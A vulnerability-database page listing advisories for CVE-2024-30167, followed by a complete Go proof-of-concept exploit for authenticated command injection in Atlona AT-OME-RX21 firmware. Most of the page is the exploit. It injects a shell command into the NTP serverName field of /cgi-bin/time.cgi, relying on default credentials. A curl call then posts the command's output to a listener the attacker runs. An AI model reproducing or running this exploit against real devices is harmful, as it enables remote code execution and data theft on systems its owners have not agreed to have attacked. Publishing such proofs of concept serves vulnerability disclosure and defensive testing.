| Reporter | Title | Published | Views | Family All 11 |
|---|---|---|---|---|
| CVE-2024-30167 | 8 May 202600:00 | β | attackerkb | |
| CVE-2024-30167 | 27 Dec 202515:00 | β | circl | |
| Atlona ATOMERX21 ε½δ»€ζ³¨ε ₯ζΌζ΄ | 29 Apr 202600:00 | β | cnnvd | |
| CVE-2024-30167 | 8 May 202600:00 | β | cve | |
| CVE-2024-30167 | 8 May 202600:00 | β | cvelist | |
| Atlona ATOMERX21 - Authenticated Command Injection | 29 Apr 202600:00 | β | exploitdb | |
| EUVD-2024-28103 | 8 May 202606:32 | β | euvd | |
| CVE-2024-30167 | 8 May 202606:16 | β | nvd | |
| PT-2026-38667 | 8 May 202600:00 | β | ptsecurity | |
| CVE-2024-30167 | 5 Jun 202618:49 | β | redhatcve |
// Exploit Title: Atlona AT-OME-RX21 Authenticated Command Injection
// Google Dork: N/A
// Date: 2025-12-28
// Exploit Author: RIZZZIOM
// Vendor Homepage: https://atlona.com
// Software Link: https://atlona.com/product/at-ome-rx21/
// Version: Firmware <= 1.5.1
// Tested on: AT-OME-RX21 Embedded Firmware (1.5.0, 1.5.1)
// CVE : CVE-2024-30167
// Usage: go run main.go -t <target_uri> -u <username> -p <password> -l <lhost> -P <lport> -c <command>
package main
import (
"bytes"
"context"
"encoding/base64"
"flag"
"fmt"
"io"
"net/http"
"os"
"os/signal"
"strings"
"syscall"
"time"
)
func main() {
banner := `
ββββββ ββ ββ ββββββ βββββ ββββ βββββ ββ ββ βββββ ββββ βββ ββββββ ββββββ
ββ ββββββ ββββ βββ ββββ ββ ββ ββββ ββββββ βββ ββββ ββ ββ ββ βββββ ββββ
ββββββ ββββ ββββββ βββββ ββββ βββββ ββ βββββ ββββ ββ ββββββ βββ
PoC by: github.com/RIZZZIOM
`
fmt.Println(banner)
target := flag.String("t", "", "Target URL (e.g: http://example.com)")
username := flag.String("u", "admin", "Username for authentication")
password := flag.String("p", "Atlona", "Password for authentication")
lport := flag.String("P", "4444", "listening port for command output")
lhost := flag.String("l", "", "listening host for command output")
command := flag.String("c", "", "Command to execute on the target")
flag.Parse()
if *target == "" || *lhost == "" || *command == "" {
fmt.Println("ERROR: Missing required parameters")
flag.PrintDefaults()
os.Exit(1)
}
url := strings.TrimRight(*target, "/") + "/cgi-bin/time.cgi"
listener := *lhost + ":" + *lport
// Buffered channel to prevent goroutine blocking if receiver exits early
responseChan := make(chan struct{}, 1)
// Create context for graceful shutdown coordination
ctx, cancel := context.WithCancel(context.Background())
defer cancel()
// Start HTTP server and get reference for shutdown
server := httpServe(listener, responseChan, ctx)
executeCommand(url, *username, *password, listener, *command)
sigChan := make(chan os.Signal, 1)
signal.Notify(sigChan, syscall.SIGINT, syscall.SIGTERM)
// Timeout to prevent indefinite waiting
responseTimeout := time.NewTimer(30 * time.Second)
defer responseTimeout.Stop()
select {
case <-responseChan:
time.Sleep(1 * time.Second)
case <-sigChan:
fmt.Printf("\n===Shutting Down===\n")
case <-responseTimeout.C:
fmt.Println("\n===Response Timeout - No response received===")
}
// Graceful server shutdown
cancel() // Signal context cancellation
shutdownCtx, shutdownCancel := context.WithTimeout(context.Background(), 5*time.Second)
defer shutdownCancel()
if err := server.Shutdown(shutdownCtx); err != nil {
fmt.Printf("Server shutdown error: %v\n", err)
}
}
func executeCommand(url, username, password, listener, command string) {
// this func sends the commands to the target
payload := fmt.Sprintf(`{"syncSntpTime":{"serverName":"time.google.com; curl -X POST --data \"$(%s)\" %s"}}`, command, listener)
auth := base64.StdEncoding.EncodeToString([]byte(username + ":" + password))
req, err := http.NewRequest("POST", url, bytes.NewBuffer([]byte(payload)))
if err != nil {
panic(err)
}
req.Header.Set("User-Agent", "Mozilla/5.0 (Windows NT 10.0) Firefox/143.0")
req.Header.Set("Content-Type", "application/json")
req.Header.Set("Authorization", "Basic "+auth)
req.Header.Set("X-Requested-With", "XMLHttpRequest")
client := &http.Client{
Timeout: 15 * time.Second,
}
resp, err := client.Do(req)
if err != nil {
fmt.Printf("ERROR: Request failed: %v\n", err)
os.Exit(1)
}
defer resp.Body.Close()
switch resp.StatusCode {
case 200:
fmt.Println("Command Injection Successful")
case 401, 403:
fmt.Printf("ERROR: Authentication Failed (HTTP %d)\n", resp.StatusCode)
case 404:
fmt.Printf("ERROR: Target Endpoint Not Found.\n")
default:
fmt.Printf("ERROR: Unexpected Response (HTTP %d)\n", resp.StatusCode)
body, _ := io.ReadAll(resp.Body)
if len(body) > 0 {
fmt.Printf("Response Body: %s\n", string(body))
}
os.Exit(1)
}
}
func getResponse(r *http.Request, responseChan chan struct{}) {
// this function serves and http server and collects response
if r.Method != http.MethodPost {
fmt.Printf("Received non-POST Request(%s)\n", r.Method)
return
}
defer r.Body.Close()
fmt.Println("\n=====Received Response=====")
body, err := io.ReadAll(r.Body)
if err != nil {
fmt.Printf("Failed To Read Response Body: %v\n", err)
return
}
fmt.Println(string(body))
// Non-blocking send to prevent goroutine deadlock
select {
case responseChan <- struct{}{}:
default:
}
}
func httpServe(listener string, responseChan chan struct{}, ctx context.Context) *http.Server {
// this function gets the command injection response from the custom header
mux := http.NewServeMux()
mux.HandleFunc("/", func(w http.ResponseWriter, r *http.Request) {
getResponse(r, responseChan)
w.WriteHeader(http.StatusNoContent)
})
server := &http.Server{
Addr: listener,
Handler: mux,
MaxHeaderBytes: 20 * 1024 * 1024,
ReadTimeout: 30 * time.Second,
WriteTimeout: 30 * time.Second,
IdleTimeout: 60 * time.Second,
}
fmt.Printf("Listening on %s for response...\n", listener)
go func() {
if err := server.ListenAndServe(); err != nil && err != http.ErrServerClosed {
fmt.Printf("ERROR: Server error: %v\n", err)
}
}()
return server
}Data
Build on a solid foundation withΒ Vulners data
WeΒ provide theΒ essential building blocks forΒ cybersecurity solutions withΒ comprehensive, structured, andΒ constantly updated vulnerability andΒ exploits data
Api
Power your application withΒ Vulners API
The Vulners REST API offers reliable, high-performance access toΒ vulnerabilityΒ intelligence, withΒ 99.9%Β SLAΒ uptime andΒ CDN-backed data delivery forΒ seamlessΒ global access
App
Assess and manage vulnerabilities withΒ VulnersΒ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation